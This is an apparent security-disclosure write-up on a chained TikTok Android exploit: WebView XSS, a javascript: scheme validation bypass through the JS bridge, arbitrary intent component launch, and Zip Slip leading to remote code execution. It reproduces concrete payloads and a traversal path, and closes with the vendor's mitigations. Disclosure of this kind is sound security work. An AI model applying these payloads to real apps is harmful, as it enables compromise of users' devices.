How TikTok’s Android WebView Exposes Multiple Vulnerabilities Leading to Remote Code Execution

Lead: Egyptian security researchers discovered multiple vulnerabilities in the TikTok Android app that can be chained to achieve remote code execution.

The researcher reported several vulnerabilities that can be linked together to enable remote code execution via dangerous attack vectors.

Generic XSS on TikTok WebView

Another XSS in Add Wiki Activity

Arbitrary component launch

Zip Slip in Tma Test Activity

Remote Code Execution (RCE)

Generic XSS on TikTok WebView

TikTok uses a WebView component that can be triggered by a deep link to display the inbox page. The WebView loads “falcon” links from internal files for performance.

After page load, the app evaluates JavaScript via android.webkit.WebView.evaluateJavascript. An initial attempt to inject an XSS payload in the URL failed, so a Frida script was used to hook the method and observe the following code:

this.a.evaluateJavascript("JSON.stringify(window.performance.getEntriesByName('" + this.webviewURL + "'))", v2);

The payload was URL‑encoded, so the researcher placed it in the fragment part after #: https://m.tiktok.com/falcon/#'),alert(1));// This triggers the execution of alert(1), confirming XSS in the WebView.

Add Wiki Activity XSS

Add Wiki Activity validates URLs only for http or https schemes, assuming other schemes are safe. This allows a malicious javascript: scheme to bypass validation.

if(!e.b(arg8)) {
    com.bytedance.t.c.e.b.a("AbsSecStrategy", "needBuildSecLink : url is invalid.");
    return false;
}
public static boolean b(String arg1) {
    return !TextUtils.isEmpty(arg1) && (arg1.startsWith("http") || arg1.startsWith("https")) && !e.a(arg1);
}

By invoking the bridge with a crafted schema, an attacker can execute JavaScript:

window.ToutiaoJSBridge.invokeMethod(JSON.stringify({
    "__callback_id":"0",
    "func":"openSchema",
    "__msg_type":"callback",
    "params":{
        "schema":"aweme://wiki?url=javascript://m.tiktok.com/%0adocument.write(\"<h1>PoC</h1>\")&disable_app_link=false"
    },
    "JSSDK":"1",
    "namespace":"host",
    "__iframe_url":"http://iframe.attacker.com/"
}));

Arbitrary Component Launch

Add Wiki Activity WebView also supports the intent scheme without restrictions. Executing the following code launches the User Favorites Activity:

location.replace("intent:#Intent;component=com.zhiliaoapp.musically/com.ss.android.ugc.aweme.favorites.ui.UserFavoritesActivity;package=com.zhiliaoapp.musically;action=android.intent.action.VIEW;end;");

Zip Slip in Tma Test Activity

The Tma Test Activity updates the SDK by downloading a zip file and extracting it. The extraction routine contains a path‑traversal check that is disabled (argument arg7 is false), allowing a crafted zip to write files outside the intended directory.

if((arg7) && !TextUtils.isEmpty(v1) && (v1.contains("../"))) {
    // check bypassed
}

By providing a zip with entries like

../../../../../../../../../data/data/com.zhiliaoapp.musically/app_lib/.../libjsc.so

, an attacker can overwrite native libraries.

Remote Code Execution (RCE)

Using the Zip Slip, a malicious library (e.g., libjsc.so) can be placed in the app’s native library directory. The overwritten library is loaded on the next app launch, enabling arbitrary code execution.

TikTok’s Mitigations

The vulnerable XSS code has been fixed.

TmaTestActivity has been removed.

Intent scheme usage has been restricted; AddWikiActivity and the main WebViewActivity no longer accept arbitrary intents.